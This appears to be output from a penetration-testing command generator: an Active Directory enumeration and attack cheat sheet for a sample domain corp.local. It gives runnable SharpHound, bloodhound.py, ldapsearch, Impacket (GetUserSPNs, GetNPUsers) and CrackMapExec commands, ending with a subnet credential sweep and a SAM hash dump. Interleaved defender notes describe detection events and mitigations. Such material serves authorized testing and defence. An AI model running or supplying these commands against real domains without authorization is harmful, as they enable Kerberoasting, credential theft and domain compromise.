Enter your target AD environment details to generate customized attack commands for authorized penetration testing.
# Active Directory collection: credentialed enumeration of the sample domain corp.local
# (DC at 10.10.10.100). The user/password/IP values are placeholders filled in by the
# generator form, not real credentials.
# Defender note: each tool below authenticates as one account, queries the DC over LDAP
# and, for session/local-group collection, touches many hosts over SMB/RPC in a short
# window; that one-account-to-many-hosts fan-out is the pattern to alert on.

# SharpHound (from Windows domain-joined or with creds):
# PowerShell/cmd syntax. The unquoted "!" in the password is harmless there but would
# trigger history expansion if pasted into an interactive bash shell.
.\SharpHound.exe -c All --domain corp.local --ldapusername jsmith --ldappassword Password123!

# BloodHound.py (from Linux with creds):
# Two invocations of what appears to be the same collector (repo script vs. installed
# entry point); -ns points at a DNS server, --dc names the domain controller directly.
python3 bloodhound.py -d corp.local -u jsmith -p 'Password123!' -ns 10.10.10.100 -c All
bloodhound-python -d corp.local -u jsmith -p 'Password123!' --dc 10.10.10.100 -c all --zip

# Enum4linux-ng (general AD enumeration):
enum4linux-ng -A -u jsmith -p 'Password123!' 10.10.10.100

# ldapdomaindump:
python3 ldapdomaindump.py -u 'corp.local\jsmith' -p 'Password123!' 10.10.10.100
# Direct LDAP queries against the DC with ldapsearch.
# -x is a simple bind: over plain ldap:// the bind password travels in cleartext unless
# the DC enforces signing/channel binding. Prefer ldaps:// or -ZZ (StartTLS, fail if it
# cannot be established) so the test account's password is not exposed on the wire.
# NOTE(review): "[email protected]" looks like a scrape/obfuscation artifact standing
# where the bind UPN (user@domain form) was; confirm before reuse.
# Defender note: these four filters are the standard discovery queries that precede
# Kerberoasting and AS-REP roasting. LDAP query auditing on the DC, and a honey account
# carrying an SPN that no legitimate client ever requests, give high-fidelity alerts.

# List domain users:
ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName

# Find Domain Admins:
ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local)" sAMAccountName

# Find SPNs (Kerberoastable accounts):
ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# Find accounts with pre-auth disabled (AS-REP Roastable):
# 1.2.840.113556.1.4.803 is the LDAP bit-AND matching rule; 4194304 (0x400000) is the
# DONT_REQ_PREAUTH bit of userAccountControl. Mitigation is simply to clear that bit.
ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
# Impacket example scripts, run from Linux with the test account's credentials.
# Defender note: GetUserSPNs.py requests a service ticket for every SPN it finds, so a
# burst of Kerberos TGS requests (Event ID 4769) from one client, typically with RC4
# encryption, is the Kerberoast signature. GetNPUsers.py needs no password at all: it asks
# the KDC for an AS-REP for each name in users.txt, which only succeeds for accounts with
# pre-authentication disabled; the fix is to make sure no account has that flag set.

# GetADUsers.py — list all domain users:
python3 GetADUsers.py -all corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100

# GetUserSPNs.py — find Kerberoastable accounts:
python3 GetUserSPNs.py corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100

# GetNPUsers.py — find AS-REP Roastable accounts:
# Unauthenticated (-no-pass); users.txt supplies the candidate account names.
python3 GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.100 -no-pass

# rpcdump.py — enumerate RPC services:
# Queries the endpoint mapper on TCP 135 without credentials.
python3 rpcdump.py -port 135 10.10.10.100
# CrackMapExec over SMB with a single domain account.
# Defender note: the /24 sweep authenticates the same account to every host in the range;
# one account producing logon events (4624/4625) on many hosts within minutes is the
# signal to watch for. --sam only works with local admin on the target and dumps local
# account hashes; per-host local admin passwords managed by LAPS limit what a dumped SAM
# is worth on any other machine.

# Enumerate shares:
crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --shares

# Enumerate users:
crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --users

# Check for local admin access on subnet:
crackmapexec smb 10.10.10.0/24 -u jsmith -p 'Password123!'

# Dump SAM database (if local admin):
crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --sam